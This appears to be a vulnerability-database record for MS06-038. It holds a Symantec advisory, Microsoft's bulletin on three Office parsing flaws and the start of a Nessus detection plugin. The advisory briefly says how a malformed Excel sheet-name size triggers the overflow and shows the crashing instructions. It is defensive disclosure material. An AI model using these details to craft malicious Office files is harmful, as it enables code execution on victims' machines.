There exists an overflow condition in\r\nMicrosoft Office\r\n when a malformed string included in an\r\nOffice file is\r\n parsed by any of the affected Office\r\napplications.\r\n\r\n\r\nDetails:\r\n\r\n The problem resides in the code of\r\nMSO.DLL, a shared\r\n library used by Office applications, so\r\nthe vulnerability\r\n can be exploited using different attack\r\nvectors.\r\n For example, the vulnerability can be\r\nexploited using a\r\n malformed Excel 2003 file. By changing\r\nthe size of the\r\n Unicode "Sheet Name" string with an\r\nincorrect size, it is\r\n possible to generate an integer overflow\r\ncondition. Excel\r\n 2003 will crash while opening the\r\nmalformed file due to an\r\n access violation error with an invalid\r\nvalue of\r\n EAX=0xFFFFFFFC.\r\n\r\n MOV EDX,DWORD PTR DS:[EAX-4]\r\n ADD EAX,-4\r\n ADD EDX,4\r\n\r\n\r\nVendor Response:\r\n\r\n The above vulnerability was addressed for\r\nthe affected\r\n platforms via Microsoft Security Bulletin\r\nMS06-38. If\r\n there are any further questions about\r\nthis statement,\r\n please contact secure@microsoft.com.\r\n\r\n\r\nRecommendation:\r\n Follow your organization's testing\r\nprocedures before\r\n applying patches or workarounds. \r\nCustomers should apply\r\n Microsoft's update as soon as possible.\r\n\r\n\r\nCommon Vulnerabilities and Exposures (CVE)\r\nInformation:\r\n\r\nThe Common Vulnerabilities and Exposures (CVE)\r\nproject has assigned\r\nthe following names to these issues. These are\r\ncandidates for\r\ninclusion in the CVE list (http://cve.mitre.org),\r\nwhich standardizes\r\nnames for security problems.\r\n\r\n CVE-2006-1540\r\n\r\n\r\n- -------Symantec Vulnerability Research Advisory\r\nInformation-------\r\n\r\nFor questions about this advisory, or to report\r\nan error:\r\nresearch@symantec.com\r\n\r\nFor details on Symantec's Vulnerability Reporting\r\nPolicy:\r\nhttp://www.symantec.com/research/Symantec-Responsible-Disclosure.pdf\r\n\r\nSymantec Vulnerability Research Advisory Archive:\r\nhttp://www.symantec.com/research/\r\n\r\nSymantec Vulnerability Research GPG Key:\r\nhttp://www.symantec.com/research/Symantec_Consulting_Services_Advisories_GPG.asc\r\n\r\n- -------------Symantec Product Advisory\r\nInformation-------------\r\n\r\nTo Report a Security Vulnerability in a Symantec\r\nProduct:\r\nsecure@symantec.com\r\n\r\nFor general information on Symantec's Product\r\nVulnerability\r\nreporting and response:\r\nhttp://www.symantec.com/security/\r\n\r\nSymantec Product Advisory Archive:\r\nhttp://www.symantec.com/avcenter/security/SymantecAdvisories.html\r\n\r\nSymantec Product Advisory PGP Key:\r\nhttp://www.symantec.com/security/Symantec-Vulnerability-Management-Key.asc\r\n\r\n-\r\n---------------------------------------------------------------\r\n\r\nCopyright (c) 2006 by Symantec Corp.\r\nPermission to redistribute this alert\r\nelectronically is granted\r\nas long as it is not edited in any way unless\r\nauthorized by\r\nSymantec Consulting Services. Reprinting the\r\nwhole or part of\r\nthis alert in any medium other than\r\nelectronically requires\r\npermission from cs_advisories@symantec.com.\r\n\r\nDisclaimer\r\nThe information in the advisory is believed to be\r\naccurate at the\r\ntime of publishing based on currently available\r\ninformation. Use\r\nof the information constitutes acceptance for use\r\nin an AS IS\r\ncondition. There are no warranties with regard to\r\nthis information.\r\nNeither the author nor the publisher accepts any\r\nliability for any\r\ndirect, indirect, or consequential loss or damage\r\narising from use\r\nof, or reliance on, this information.\r\n\r\nSymantec, Symantec products, and Symantec\r\nConsulting Services are\r\nregistered trademarks of Symantec Corp. and/or\r\naffiliated companies\r\nin the United States and other countries. All\r\nother registered and\r\nunregistered trademarks represented in this\r\ndocument are the sole\r\nproperty of their respective companies/owners.\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.0 (Cygwin)\r\n\r\niD8DBQFEspITuk7IIFI45IARAiJyAJ4gvZGmSFL5B+ZOpCYrq3pXQrH6WgCgjDJu\r\nc6RMB/od64/cLbHSwy3EC/w=\r\n=MYz8\r\n-----END PGP SIGNATURE-----", "edition": 1, "modified": "2006-07-11T00:00:00", "published": "2006-07-11T00:00:00", "id": "SECURITYVULNS:DOC:13481", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:13481", "title": "SYMSA-2006-007: Microsoft Office Malformed String Parsing Vulnerability", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:18", "bulletinFamily": "software", "cvelist": ["CVE-2006-2389", "CVE-2006-1540", "CVE-2006-1316"], "description": "Microsoft Security Bulletin MS06-038\r\nVulnerabilities in Microsoft Office Could Allow Remote Code Execution (917284)\r\nPublished: July 11, 2006\r\n\r\nVersion: 1.0\r\nSummary\r\n\r\nWho Should Read this Document: Customers who use Microsoft Office\r\n\r\nImpact of Vulnerability: Remote Code Execution\r\n\r\nMaximum Severity Rating: Critical\r\n\r\nRecommendation: Customers should apply the update immediately\r\n\r\nSecurity Update Replacement: None\r\n\r\nCaveats: None\r\n\r\nTested Software and Security Update Download Locations:\r\n\r\nAffected Software:\r\n\u2022\t\r\n\r\nMicrosoft Office 2003 Service Pack 1 or Service Pack 2 - Download the update (KB917151)\r\n\u2022\t\r\n\r\nMicrosoft Access 2003\r\n\u2022\t\r\n\r\nMicrosoft Excel 2003\r\n\u2022\t\r\n\r\nMicrosoft Excel 2003 Viewer\r\n\u2022\t\r\n\r\nMicrosoft FrontPage 2003\r\n\u2022\t\r\n\r\nMicrosoft InfoPath 2003\r\n\u2022\t\r\n\r\nMicrosoft OneNote 2003\r\n\u2022\t\r\n\r\nMicrosoft Outlook 2003\r\n\u2022\t\r\n\r\nMicrosoft PowerPoint 2003\r\n\u2022\t\r\n\r\nMicrosoft Project 2003\r\n\u2022\t\r\n\r\nMicrosoft Publisher 2003\r\n\u2022\t\r\n\r\nMicrosoft Visio 2003\r\n\u2022\t\r\n\r\nMicrosoft Word 2003\r\n\u2022\t\r\n\r\nMicrosoft Word 2003 Viewer\r\n\u2022\t\r\n\r\nMicrosoft Office XP Service Pack 3 - Download the update (KB917150)\r\n\u2022\t\r\n\r\nMicrosoft Access 2002\r\n\u2022\t\r\n\r\nMicrosoft Excel 2002\r\n\u2022\t\r\n\r\nMicrosoft FrontPage 2002\r\n\u2022\t\r\n\r\nMicrosoft Outlook 2002\r\n\u2022\t\r\n\r\nMicrosoft PowerPoint 2002\r\n\u2022\t\r\n\r\nMicrosoft Publisher 2002\r\n\u2022\t\r\n\r\nMicrosoft Visio 2002\r\n\u2022\t\r\n\r\nMicrosoft Word 2002\r\n\u2022\t\r\n\r\nMicrosoft Office 2000 Service Pack 3 - Download the update (KB917152)\r\n\u2022\t\r\n\r\nMicrosoft Access 2000\r\n\u2022\t\r\n\r\nMicrosoft Excel 2000\r\n\u2022\t\r\n\r\nMicrosoft FrontPage 2000\r\n\u2022\t\r\n\r\nMicrosoft Outlook 2000\r\n\u2022\t\r\n\r\nMicrosoft PowerPoint 2000\r\n\u2022\t\r\n\r\nMicrosoft Publisher 2000\r\n\u2022\t\r\n\r\nMicrosoft Word 2000\r\n\u2022\t\r\n\r\nMicrosoft Project 2002 Service Pack 1 - Download the update (KB917150)\r\n\u2022\t\r\n\r\nMicrosoft Visio 2002 Service Pack 2 - Download the update (KB917150)\r\n\u2022\t\r\n\r\nMicrosoft Project 2000 Service Release 1 Download the update (KB917152)\r\n\u2022\t\r\n\r\nMicrosoft Office 2004 for Mac\r\n\u2022\t\r\n\r\nMicrosoft Office v. X for Mac\r\n\r\nNon-Affected Software:\r\n\u2022\t\r\n\r\nMicrosoft Works Suites:\r\n\u2022\t\r\n\r\nMicrosoft Works Suite 2004\r\n\u2022\t\r\n\r\nMicrosoft Works Suite 2005\r\n\u2022\t\r\n\r\nMicrosoft Works Suite 2006\r\n\r\nThe software in this list has been tested to determine whether the versions are affected. Other versions either no longer include security update support or may not be affected. To determine the support life cycle for your product and version, visit the Microsoft Support Lifecycle Web site.\r\nTop of sectionTop of section\r\nGeneral Information\r\n\t\r\nExecutive Summary\r\n\r\nThis update resolves several newly discovered, privately reported and public vulnerabilities. Each vulnerability is documented in this bulletin in its own "Vulnerability Details" section.\r\n\r\nWhen using vulnerable versions of Office, if a user were logged on with administrative user rights, an attacker who successfully exploited this vulnerability could take complete control of the client workstation. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.\r\n\r\nWe recommend that customers apply the update immediately.\r\n\r\nSeverity Ratings and Vulnerability Identifiers:\r\nVulnerability Identifiers\tImpact of Vulnerability\tMicrosoft Office 2003\tMicrosoft Office XP\tMicrosoft Office 2000 \tMicrosoft Office 2004 for Mac or Microsoft Office v. X for Mac\r\n\r\nMicrosoft Office Parsing Vulnerability - CVE-2006-1316\r\n\t\r\n\r\nRemote Code Execution\r\n\t\r\n\r\nImportant\r\n\t\r\n\r\nImportant\r\n\t\r\n\r\nCritical\r\n\t\r\n\r\nImportant\r\n\r\nMicrosoft Office Malformed String Parsing Vulnerability - CVE-2006-1540\r\n\t\r\n\r\nRemote Code Execution\r\n\t\r\n\r\nImportant\r\n\t\r\n\r\nImportant\r\n\t\r\n\r\nCritical\r\n\t\r\n\r\nImportant\r\n\r\nMicrosoft Office Property Vulnerability - CVE-2006-2389\r\n\t\r\n\r\nRemote Code Execution\r\n\t\r\n\r\nImportant\r\n\t\r\n\r\nImportant\r\n\t\r\n\r\nCritical\r\n\t\r\n\r\nImportant\r\n\r\nAggregate Severity of All Vulnerabilities\r\n\t\r\n\r\n \r\n\t\r\n\r\nImportant\r\n\t\r\n\r\nImportant\r\n\t\r\n\r\nCritical\r\n\t\r\n\r\nImportant\r\n\r\nThis assessment is based on the types of systems that are affected by the vulnerability, their typical deployment patterns, and the effect that exploiting the vulnerability would have on them.\r\nTop of sectionTop of section\r\n\t\r\nFrequently Asked Questions (FAQ) Related to This Security Update\r\n\r\nCan I use the Microsoft Baseline Security Analyzer (MBSA) to determine whether this update is required?\r\n\r\nThe following table provides the MBSA detection summary for this security update.\r\nSoftware\tMBSA 1.2.1\tMBSA 2.0\r\n\r\nMicrosoft Office 2003\r\n\t\r\n\r\nYes\r\n\t\r\n\r\nYes\r\n\r\nMicrosoft Office XP\r\n\t\r\n\r\nYes\r\n\t\r\n\r\nYes\r\n\r\nMicrosoft Office 2000\r\n\t\r\n\r\nYes\r\n\t\r\n\r\nNo\r\n\r\nMicrosoft Office 2004 for Mac\r\n\t\r\n\r\nNo\r\n\t\r\n\r\nNo\r\n\r\nMicrosoft Office v. X for Mac\r\n\t\r\n\r\nNo\r\n\t\r\n\r\nNo\r\n\r\nNote MBSA 1.2.1 uses an integrated version of the Office Detection Tool (ODT) which does not support remote scans of this security update. For more information about MBSA, visit the MBSA Web site.\r\n\r\nFor more information about MBSA, visit the MBSA Web site. For more information about the programs that Microsoft Update and MBSA 2.0 currently do not detect, see Microsoft Knowledge Base Article 895660.\r\n\r\nCan I use Systems Management Server (SMS) to determine whether this update is required?\r\n\r\nThe following table provides the SMS summary for this security update.\r\nSoftware\tSMS 2.0\tSMS 2003\r\n\r\nMicrosoft Office 2003\r\n\t\r\n\r\nYes\r\n\t\r\n\r\nYes\r\n\r\nMicrosoft Office XP\r\n\t\r\n\r\nYes\r\n\t\r\n\r\nYes\r\n\r\nMicrosoft Office 2000\r\n\t\r\n\r\nYes\r\n\t\r\n\r\nNo\r\n\r\nMicrosoft Office 2004 for Mac\r\n\t\r\n\r\nNo\r\n\t\r\n\r\nNo\r\n\r\nMicrosoft Office v. X for Mac\r\n\t\r\n\r\nNo\r\n\t\r\n\r\nNo\r\n\r\nSMS uses MBSA for detection. Therefore, SMS has the same limitation that is listed earlier in this bulletin related to programs that MBSA does not detect.\r\n\r\nFor SMS 2.0, the SMS SUS Feature Pack, which includes the Security Update Inventory Tool, can be used by SMS to detect security updates. SMS SUIT uses the MBSA 1.2.1 engine for detection. For more information about the Security Update Inventory Tool, visit the following Microsoft Web site. For more information about the limitations of the Security Update Inventory Tool, see Microsoft Knowledge Base Article 306460. The SMS SUS Feature Pack also includes the Microsoft Office Inventory Tool to detect required updates for Microsoft Office applications.\r\n\r\nFor SMS 2003, the SMS 2003 Inventory Tool for Microsoft Updates can be used by SMS to detect security updates that are offered by Microsoft Update and that are supported by Windows Server Update Services. For more information about the SMS 2003 Inventory Tool for Microsoft Updates, visit the following Microsoft Web site. SMS 2003 can also use the Microsoft Office Inventory Tool to detect required updates for Microsoft Office applications.\r\n\r\nFor more information about SMS, visit the SMS Web site.\r\nTop of sectionTop of section\r\n\t\r\nVulnerability Details\r\n\t\r\nMicrosoft Office Parsing Vulnerability - CVE-2006-1316\r\n\r\nA remote code execution vulnerability exists in Office, and could be exploited when a malformed string included in an Office file was parsed by any of the affected Office applications. Such a string might be included in an email attachment processed by one of the affected applications or hosted on a malicious web site. Viewing or previewing a malformed email message in an affected version of Outlook could not lead to exploitation of this vulnerability. An attacker could exploit the vulnerability by constructing a specially crafted Office file that could allow remote code execution.\r\n\r\nIf a user were logged on with administrative user rights, an attacker who successfully exploited this vulnerability could take complete control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less affected than users who operate with administrative user rights.\r\n\t\r\nMitigating Factors for Microsoft Office Parsing Vulnerability - CVE-2006-1316\r\n\u2022\t\r\n\r\nAn attacker who successfully exploited this vulnerability could gain the same user rights as the local user. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.\r\n\u2022\t\r\n\r\nOn Outlook 2002 and Outlook 2003, the vulnerability could not be exploited automatically through e-mail. For an attack to be successful a user must accept a prompt confirming that they Open, Save or Cancel the attachment that is sent in an e-mail message before the exploit could occur.\r\n\u2022\t\r\n\r\nIn a Web-based attack scenario, an attacker could host a Web site that contains a Web page that is used to exploit this vulnerability. In addition, compromised Web sites and Web sites that accept or host user-provided content or advertisements could contain specially crafted content that could exploit this vulnerability. In all cases, however, an attacker would have no way to force users to visit these Web sites. Instead, an attacker would have to persuade users to visit the Web site, typically by getting them to click a link in an e-mail message or instant messenger message that takes users to the attacker's Web site.\r\n\r\nNote Office 2000 does not prompt the user to Open, Save, or Cancel before opening a document.\r\nTop of sectionTop of section\r\n\t\r\nWorkarounds for Microsoft Parsing Vulnerability - CVE-2006-1316:\r\n\r\nMicrosoft has tested the following workarounds. While these workarounds will not correct the underlying vulnerability, they help block known attack vectors. When a workaround reduces functionality, it is identified in the following section.\r\n\r\nDo not open or save Microsoft Office files that you receive from un-trusted sources or that you received unexpectedly from trusted sources.\r\n\r\nThis vulnerability could be exploited when a user opens a file.\r\nTop of sectionTop of section\r\n\t\r\nFAQ for Microsoft Office Parsing Vulnerability - CVE-2006-1316:\r\n\r\nWhat is the scope of the vulnerability?\r\nA remote code execution vulnerability exists in Office, and could be exploited when a malformed string included in an Office file was parsed by any of the affected Office applications. Such a string might be included in an email attachment processed by one of the affected applications or hosted on a malicious web site. Viewing or previewing a malformed email message in an affected version of Outlook could not lead to exploitation of this vulnerability. An attacker could exploit the vulnerability by constructing a specially crafted Office file that could allow remote code execution.\r\n\r\nIf a user were logged on with administrative user rights, an attacker who successfully exploited this vulnerability could take complete control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less affected than users who operate with administrative user rights.\r\n\r\nWhat causes the vulnerability?\r\nWhen Office opens a specially crafted Office file and parses a malformed string, it may corrupt system memory in such a way that an attacker could execute arbitrary code.\r\n\r\nWhat might an attacker use the vulnerability to do?\r\nAn attacker who successfully exploited this vulnerability could cause arbitrary code to run with the privileges of the user who opened the file.\r\n\r\nHow could an attacker exploit the vulnerability?\r\nIn a Web-based attack scenario, an attacker could host a Web site that contains a Web page that is used to exploit this vulnerability. In addition, compromised Web sites and Web sites that accept or host user-provided content or advertisements could contain specially crafted content that could exploit this vulnerability. In all cases, however, an attacker would have no way to force users to visit these Web sites. Instead, an attacker would have to persuade users to visit the Web site, typically by getting them to click a link in an e-mail message or instant messenger message that takes users to the attacker's Web site.\r\n\r\nIn an e-mail attack scenario, an attacker could exploit the vulnerability by sending a specially-crafted file to the user and by persuading the user to open the file.\r\n\r\nWhat systems are primarily at risk from the vulnerability?\r\nWorkstations and terminal servers are primarily at risk. Servers could be at more risk if users who have sufficient administrative permissions are given the ability to log on to servers and to run programs. However, best practices strongly discourage allowing this.\r\n\r\nWhat does the update do?\r\nThe update removes the vulnerability by modifying the way that Office parses the length of a record before it passes the message to the allocated buffer.\r\n\r\nWhen this security bulletin was issued, had this vulnerability been publicly disclosed?\r\nNo. Microsoft received information about this vulnerability through responsible disclosure. Microsoft had not received any information to indicate that this vulnerability had been publicly disclosed when this security bulletin was originally issued. This security bulletin addresses the privately disclosed vulnerability as well as additional issues discovered through internal investigations.\r\n\r\nWhen this security bulletin was issued, had Microsoft received any reports that this vulnerability was being exploited?\r\nNo. Microsoft had not received any information to indicate that this vulnerability had been publicly used to attack customers and had not seen any examples of proof of concept code published when this security bulletin was originally issued.\r\nTop of sectionTop of section\r\nTop of sectionTop of section\r\n\t\r\nMicrosoft Office Malformed String Parsing Vulnerability - CVE-2006-1540\r\n\r\nA remote code execution vulnerability exists in Office, and could be exploited when a malformed string included in an Office file was parsed by any of the affected Office applications. Such a string might be included in an email attachment processed by one of the affected applications or hosted on a malicious web site. Viewing or previewing a malformed email message in an affected version of Outlook could not lead to exploitation of this vulnerability. An attacker could exploit the vulnerability by constructing a specially crafted Office file that could allow remote code execution.\r\n\r\nIf a user were logged on with administrative user rights, an attacker who successfully exploited this vulnerability could take complete control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less affected than users who operate with administrative user rights.\r\n\t\r\nMitigating Factors for Microsoft Office Malformed String Parsing Vulnerability - CVE-2006-1540\r\n\u2022\t\r\n\r\nAn attacker who successfully exploited this vulnerability could gain the same user rights as the local user. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.\r\n\u2022\t\r\n\r\nOn Outlook 2002 and Outlook 2003, the vulnerability could not be exploited automatically through e-mail. For an attack to be successful a user must accept a prompt confirming that they Open, Save or Cancel the attachment that is sent in an e-mail message before the exploit could occur.\r\n\u2022\t\r\n\r\nIn a Web-based attack scenario, an attacker could host a Web site that contains a Web page that is used to exploit this vulnerability. In addition, compromised Web sites and Web sites that accept or host user-provided content or advertisements could contain specially crafted content that could exploit this vulnerability. In all cases, however, an attacker would have no way to force users to visit these Web sites. Instead, an attacker would have to persuade users to visit the Web site, typically by getting them to click a link in an e-mail message or instant messenger message that takes users to the attacker's Web site.\r\n\r\nNote Office 2000 does not prompt the user to Open, Save, or Cancel before opening a document.\r\nTop of sectionTop of section\r\n\t\r\nWorkarounds for Microsoft Office Malformed String Parsing Vulnerability - CVE-2006-1540:\r\n\r\nMicrosoft has tested the following workarounds. While these workarounds will not correct the underlying vulnerability, they help block known attack vectors. When a workaround reduces functionality, it is identified in the following section.\r\n\r\nDo not open or save Microsoft Office files that you receive from un-trusted sources or that you received unexpectedly from trusted sources.\r\n\r\nThis vulnerability could be exploited when a user opens a file.\r\nTop of sectionTop of section\r\n\t\r\nFAQ for Microsoft Office Malformed String Parsing Vulnerability - CVE-2006-1540:\r\n\r\nWhat is the scope of the vulnerability?\r\nThis is a remote code execution vulnerability. An attacker who successfully exploited this vulnerability could remotely take complete control of an affected system.\r\n\r\nIf a user were logged on with administrative user rights, an attacker who successfully exploited this vulnerability could take complete control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less affected than users who operate with administrative user rights.\r\n\r\nWhat causes the vulnerability?\r\nWhen Office opens a specially crafted Office file and parses a malformed string, it may corrupt system memory in such a way that an attacker could execute arbitrary code.\r\n\r\nWhat might an attacker use the vulnerability to do?\r\nAn attacker who successfully exploited this vulnerability could cause arbitrary code to run with the privileges of the user who opened the file.\r\n\r\nHow could an attacker exploit the vulnerability?\r\nIn a Web-based attack scenario, an attacker could host a Web site that contains a Web page that is used to exploit this vulnerability. In addition, compromised Web sites and Web sites that accept or host user-provided content or advertisements could contain specially crafted content that could exploit this vulnerability. In all cases, however, an attacker would have no way to force users to visit these Web sites. Instead, an attacker would have to persuade users to visit the Web site, typically by getting them to click a link in an e-mail message or instant messenger message that takes users to the attacker's Web site.\r\n\r\nIn an e-mail attack scenario, an attacker could exploit the vulnerability by sending a specially-crafted file to the user and by persuading the user to open the file.\r\n\r\nWhat systems are primarily at risk from the vulnerability?\r\nWorkstations and terminal servers are primarily at risk. Servers could be at more risk if users who have sufficient administrative permissions are given the ability to log on to servers and to run programs. However, best practices strongly discourage allowing this.\r\n\r\nWhat does the update do?\r\nThe update removes the vulnerability by modifying the way that Office parses the length of a record before it passes the message to the allocated buffer.\r\n\r\nWhen this security bulletin was issued, had this vulnerability been publicly disclosed?\r\nYes. While the initial report was provided through responsible disclosure, the vulnerability was later disclosed publicly. This security bulletin addresses the publicly disclosed vulnerability as well as additional issues discovered through internal investigations.\r\n\r\nWhen this security bulletin was issued, had Microsoft received any reports that this vulnerability was being exploited?\r\nYes. When the security bulletin was released, Microsoft had received information that this vulnerability was being exploited.\r\nTop of sectionTop of section\r\nTop of sectionTop of section\r\n\t\r\nMicrosoft Office Property Vulnerability - CVE-2006-2389\r\n\r\nA remote code execution vulnerability exists in Office, and could be exploited when a malformed property included in an Office file was parsed by any of the affected Office applications. Such a property might be included in an email attachment processed by one of the affected applications or hosted on a malicious web site. Viewing or previewing a malformed email message in an affected version of Outlook could not lead to exploitation of this vulnerability. An attacker could exploit the vulnerability by constructing a specially crafted Office file that could allow remote code execution.\r\n\r\nIf a user were logged on with administrative user rights, an attacker who successfully exploited this vulnerability could take complete control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less affected than users who operate with administrative user rights.\r\n\t\r\nMitigating Factors for Microsoft Office Property Vulnerability - CVE-2006-2389\r\n\u2022\t\r\n\r\nAn attacker who successfully exploited this vulnerability could gain the same user rights as the local user. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.\r\n\u2022\t\r\n\r\nOn Outlook 2002 and Outlook 2003, the vulnerability could not be exploited automatically through e-mail. For an attack to be successful a user must accept a prompt confirming that they Open, Save or Cancel the attachment that is sent in an e-mail message before the exploit could occur.\r\n\u2022\t\r\n\r\nIn a Web-based attack scenario, an attacker could host a Web site that contains a Web page that is used to exploit this vulnerability. In addition, compromised Web sites and Web sites that accept or host user-provided content or advertisements could contain specially crafted content that could exploit this vulnerability. In all cases, however, an attacker would have no way to force users to visit these Web sites. Instead, an attacker would have to persuade users to visit the Web site, typically by getting them to click a link in an e-mail message or instant messenger message that takes users to the attacker's Web site.\r\n\r\nNote Office 2000 does not prompt the user to Open, Save, or Cancel before opening a document.\r\nTop of sectionTop of section\r\n\t\r\nWorkarounds for Microsoft Property Vulnerability - CVE-2006-2389:\r\n\r\nMicrosoft has tested the following workarounds. While these workarounds will not correct the underlying vulnerability, they help block known attack vectors. When a workaround reduces functionality, it is identified in the following section.\r\n\r\nDo not open or save Microsoft Office files that you receive from un-trusted sources or that you received unexpectedly from trusted sources.\r\n\r\nThis vulnerability could be exploited when a user opens a file.\r\nTop of sectionTop of section\r\n\t\r\nFAQ for Microsoft Office Property Vulnerability - CVE-2006-2389:\r\n\r\nWhat is the scope of the vulnerability?\r\nA remote code execution vulnerability exists in Office, and could be exploited when a malformed property included in an Office file was parsed by any of the affected Office applications. Such a property might be included in an email attachment processed by one of the affected applications or hosted on a malicious web site. Viewing or previewing a malformed email message in an affected version of Outlook could not lead to exploitation of this vulnerability. An attacker could exploit the vulnerability by constructing a specially crafted Office file that could allow remote code execution.\r\n\r\nIf a user were logged on with administrative user rights, an attacker who successfully exploited this vulnerability could take complete control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less affected than users who operate with administrative user rights.\r\n\r\nWhat causes the vulnerability?\r\nWhen Office opens a specially crafted Office file and parses a malformed property, it may corrupt system memory in such a way that an attacker could execute arbitrary code.\r\n\r\nWhat might an attacker use the vulnerability to do?\r\nAn attacker who successfully exploited this vulnerability could cause arbitrary code to run with the privileges of the user who opened the file.\r\n\r\nHow could an attacker exploit the vulnerability?\r\nIn a Web-based attack scenario, an attacker could host a Web site that contains a Web page that is used to exploit this vulnerability. In addition, compromised Web sites and Web sites that accept or host user-provided content or advertisements could contain specially crafted content that could exploit this vulnerability. In all cases, however, an attacker would have no way to force users to visit these Web sites. Instead, an attacker would have to persuade users to visit the Web site, typically by getting them to click a link in an e-mail message or instant messenger message that takes users to the attacker's Web site.\r\n\r\nIn an e-mail attack scenario, an attacker could exploit the vulnerability by sending a specially-crafted file to the user and by persuading the user to open the file.\r\n\r\nWhat systems are primarily at risk from the vulnerability?\r\nWorkstations and terminal servers are primarily at risk. Servers could be at more risk if users who have sufficient administrative permissions are given the ability to log on to servers and to run programs. However, best practices strongly discourage allowing this.\r\n\r\nWhat does the update do?\r\nThe update removes the vulnerability by modifying the way that Office parses the length of a record before it passes the message to the allocated buffer.\r\n\r\nWhen this security bulletin was issued, had this vulnerability been publicly disclosed?\r\nNo. Microsoft received information about this vulnerability through responsible disclosure. Microsoft had not received any information to indicate that this vulnerability had been publicly disclosed when this security bulletin was originally issued. This security bulletin addresses the privately disclosed vulnerability as well as additional issues discovered through internal investigations.\r\n\r\nWhen this security bulletin was issued, had Microsoft received any reports that this vulnerability was being exploited?\r\nNo. Microsoft had not received any information to indicate that this vulnerability had been publicly used to attack customers and had not seen any examples of proof of concept code published when this security bulletin was originally issued.\r\n\r\nRevisions: \r\n\u2022\t\r\n\r\nV1.0 (July 11, 2006): Bulletin published.", "edition": 1, "modified": "2006-07-11T00:00:00", "published": "2006-07-11T00:00:00", "id": "SECURITYVULNS:DOC:13479", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:13479", "title": "Microsoft Security Bulletin MS06-038 Vulnerabilities in Microsoft Office Could Allow Remote Code Execution (917284)", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2021-04-01T06:15:35", "description": "The remote host is running a version of Microsoft Office that could\nallow arbitrary code to be run on this host.\n\nTo succeed, the attacker would have to send a rogue file to a user of\nthe remote computer and have him open it with Microsoft Office.", "edition": 28, "published": "2006-07-11T00:00:00", "title": "MS06-038: Vulnerabilities in Microsoft Office Could Allow Remote Code Execution (917284)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-2389", "CVE-2006-1318", "CVE-2006-1540", "CVE-2006-1316"], "modified": "2021-04-02T00:00:00", "cpe": ["cpe:/a:microsoft:word", "cpe:/a:microsoft:word_viewer", "cpe:/a:microsoft:frontpage", "cpe:/a:microsoft:excel_viewer", "cpe:/a:microsoft:onenote", "cpe:/a:microsoft:powerpoint", "cpe:/a:microsoft:infopath", "cpe:/a:microsoft:visio", "cpe:/a:microsoft:outlook", "cpe:/a:microsoft:office", "cpe:/a:microsoft:access", "cpe:/a:microsoft:project", "cpe:/a:microsoft:publisher", "cpe:/a:microsoft:excel"], "id": "SMB_NT_MS06-038.NASL", "href": "https://www.tenable.com/plugins/nessus/22032", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(22032);\n script_version(\"1.43\");\n script_cvs_date(\"Date: 2018/11/15 20:50:30\");\n\n script_cve_id(\n \"CVE-2006-1316\",\n \"CVE-2006-1318\",\n \"CVE-2006-1540\",\n \"CVE-2006-2389\"\n );\n script_bugtraq_id(18912, 18911, 18889);\n script_xref(name:\"CERT\", value:\"409316\");\n script_xref(name:\"CERT\", value:\"580036\");\n script_xref(name:\"CERT\", value:\"609868\");\n script_xref(name:\"MSFT\", value:\"MS06-038\");\n script_xref(name:\"MSKB\", value:\"917150\");\n script_xref(name:\"MSKB\", value:\"917151\");\n script_xref(name:\"MSKB\", value:\"917152\");\n script_xref(name:\"MSKB\", value:\"917284\");\n\n script_name(english:\"MS06-038: Vulnerabilities in Microsoft Office Could Allow Remote Code Execution (917284)\");\n script_summary(english:\"Determines the version of MSO.dll\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"Arbitrary code can be executed on the remote host through Microsoft\nOffice.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running a version of Microsoft Office that could\nallow arbitrary code to be run on this host.\n\nTo succeed, the attacker would have to send a rogue file to a user of\nthe remote computer and have him open it with Microsoft Office.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2006/ms06-038\");\n script_set_attribute(attribute:\"solution\", value:\"Microsoft has released a set of patches for Office 2000, XP and 2003.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_cwe_id(94);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/02/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/07/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/07/11\");\n\n 